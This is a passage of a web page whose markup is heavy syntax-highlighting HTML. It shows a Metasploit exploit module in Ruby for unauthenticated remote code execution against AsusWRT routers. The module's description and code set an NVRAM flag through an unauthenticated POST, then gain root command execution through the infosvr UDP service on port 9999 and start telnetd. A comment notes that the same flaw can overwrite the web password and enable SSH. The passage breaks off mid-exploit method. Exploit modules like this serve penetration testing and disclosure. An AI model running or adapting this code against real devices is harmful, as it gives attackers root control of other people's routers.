class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">super<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">update_info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Name&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AsusWRT LAN Unauthenticated Remote Code Execution&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Description&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-e\">q<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">HTTP <\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">AsusWRT <\/span><span class=\"crayon-i\">has<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">flaw <\/span><span class=\"crayon-e\">where <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-e\">allows <\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">unauthenticated <\/span><span class=\"crayon-e\">client <\/span><span class=\"crayon-st\">to<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">perform<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POST <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">certain <\/span><span class=\"crayon-v\">cases<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">combined <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">another <\/span><span class=\"crayon-e\">vulnerability <\/span><span class=\"crayon-st\">in<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">VPN <\/span><span class=\"crayon-e\">configuration <\/span><span class=\"crayon-e\">upload <\/span><span class=\"crayon-e\">routine <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">sets <\/span><span class=\"crayon-e\">NVRAM <\/span><span class=\"crayon-e\">configuration <\/span><span class=\"crayon-e\">variables <\/span><span class=\"crayon-e\">directly<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-16\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">POST <\/span><span class=\"crayon-e\">request <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">special <\/span><span class=\"crayon-e\">command <\/span><span class=\"crayon-v\">mode<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">command <\/span><span class=\"crayon-e\">mode <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-st\">then<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">abused <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">sending<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">UDP <\/span><span class=\"crayon-e\">packet <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">infosvr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">running<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-18\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">port <\/span><span class=\"crayon-i\">UDP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9999<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">directly <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-e\">commands <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit <\/span><span class=\"crayon-e\">leverages <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">start <\/span><span class=\"crayon-e\">telnetd <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">random <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">then<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connects <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">It <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">been <\/span><span class=\"crayon-e\">tested <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">RT<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">AC68U <\/span><span class=\"crayon-e\">running <\/span><span class=\"crayon-e\">AsusWRT <\/span><span class=\"crayon-i\">Version<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.0.0.4.380.7743.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Author&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Beyond Security&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># Vulnerability discovery and Metasploit module<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;License&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MSF_LICENSE<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;References&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;CVE&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;add later&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;Add&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;links&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Targets&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AsusWRT &lt; (add fixed version later)&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Payload&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Compat&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;PayloadType&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;cmd_interact&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;ConnectionType&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;find&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Privileged&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Platform&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;unix&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Arch&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARCH_CMD<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;DefaultOptions&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PAYLOAD&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;cmd\/unix\/interact&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;DisclosureDate&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;DefaultTarget&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">register_options<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Opt<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">RPORT<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">9999<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">register_advanced_options<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptInt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;ASUSWRTPORT&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;AsusWRT HTTP portal port&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-61\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-63\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-v\">exploit<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">post_data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">MIME<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Message<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-67\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">post_data<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_part<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;1&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">transfer_encoding<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content_disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;form-data; name=&#8221;ateCommand_flag&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post_data<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">to_s<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-71\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_request_cgi<\/span><span 